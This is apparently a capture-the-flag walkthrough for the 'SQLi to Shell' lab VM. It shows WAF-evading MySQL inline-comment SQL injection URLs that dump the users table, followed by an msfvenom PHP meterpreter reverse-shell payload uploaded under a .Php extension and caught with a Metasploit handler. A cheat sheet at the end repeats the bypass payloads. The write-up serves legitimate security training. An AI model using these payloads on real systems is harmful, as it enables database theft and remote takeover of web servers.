sqli_to_shell 1 ctf with WAF

Hi friends, welcome to hackxsploit. Here is the complete walkthrough of SQLi to Shell: 1 CTF. It is a beginner-level CTF built around SQL injection.

The specialty of this CTF is that it sits behind a WAF (web application firewall).

So I cracked it with WAF-bypass SQL commands (MySQL inline comments).

Let's crack it.
  
Objective         : Get root access on the system
Attacking machine : Linux kali 4.17.0-kali1-amd64
Target machine    : SQLi To Shell with WAF, ip: 172.16.166.136
**In your case the ip may differ, so replace my ip with yours**
-----------------------------------------------------------------------------------------------------------------------------------
Let's start by finding our target machine's ip.
# arp-scan -l

Scan the ip with Nmap (nmap takes a host or ip, not a URL; -sS is a SYN scan, -sC runs default scripts, -sV detects versions).
# nmap -sS -sC -sV 172.16.166.136

Here port 80 is open, so open the ip in a browser.
http://172.16.166.136
Find the GET parameter by clicking on the "test" tab.

Count the number of columns in the query. The keywords are wrapped in MySQL inline comments (/*! ... */): MySQL executes the comment body as normal SQL, but the WAF does not see the plain keywords.
http://172.16.166.136/cat.php?id=1 /*!order by */ 1,2,3,4,--+


Find the vulnerable (reflected) columns.
http://172.16.166.136/cat.php?id=1 /*!union*/ /*!select*/ 1,/*!2*/,3,4 --+
Here column 2 is reflected in the page, so we use it for output.

Find the tables in the database.
http://172.16.166.136/cat.php?id=1 /*!union*/ /*!select*/ 1,/*!table_name*/,3,4 from /*!information_schema.tables*/ --+


Find the columns of the table "users".
http://172.16.166.136/cat.php?id=1 /*!union*/ /*!select*/ 1,/*!column_name*/,3,4 from /*!information_schema.columns*/ where table_name="users" --+


Dump the data from the columns login and password.
http://172.16.166.136/cat.php?id=1 /*!union*/ /*!select*/ 1, /*!group_concat(login,"",password)*/,3,4 from users --+


Here we got the login name and password.
login = admin
password = 8efe310f9ab3efeae8d410a8e0166eb2

The password is stored as a hash, so crack it. After cracking it we get the password "P4ssw0rd".

Now go to http://172.16.166.136/admin/login.php to log in to the web application. Use login = admin and password = P4ssw0rd.
Here we can upload our payload to get a reverse connection in Metasploit.

Use msfvenom to create the payload (no space after lhost=).
# msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.166.163 lport=4444 -f raw > prince.Php

**Use your own local ip here**

Upload the payload into the web application.
**The extension must be .Php, not .php.**
Now start Metasploit as the listener for the meterpreter session and type these commands.
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 172.16.166.163
set lport 4444
exploit

Go to this link to execute the payload.
http://172.16.166.136/admin/uploads/prince.Php

Wow, finally we got meterpreter.

Step-by-step commands for the WAF bypass
WAF bypass MySQL notes:
Prepared by : Prince@lucideus
Reference   : owasp.org


1.  /*!order by */ 1,2,3,4,--+
2.  /*!union*/ /*!select*/ 1,/*!2*/,3,4 --+
3.  /*!union*/ /*!select*/ 1,/*!table_name*/,3,4 from /*!information_schema.tables*/ --+
4.  /*!union*/ /*!select*/ 1,/*!column_name*/,3,4 from /*!information_schema.columns*/ where table_name="users" --+
5.  /*!union*/ /*!select*/ 1, /*!group_concat(login,"",password)*/,3,4 from users --+


I hope you enjoyed it. :-)
Give your feedback:
princelucideus121@gmail.com
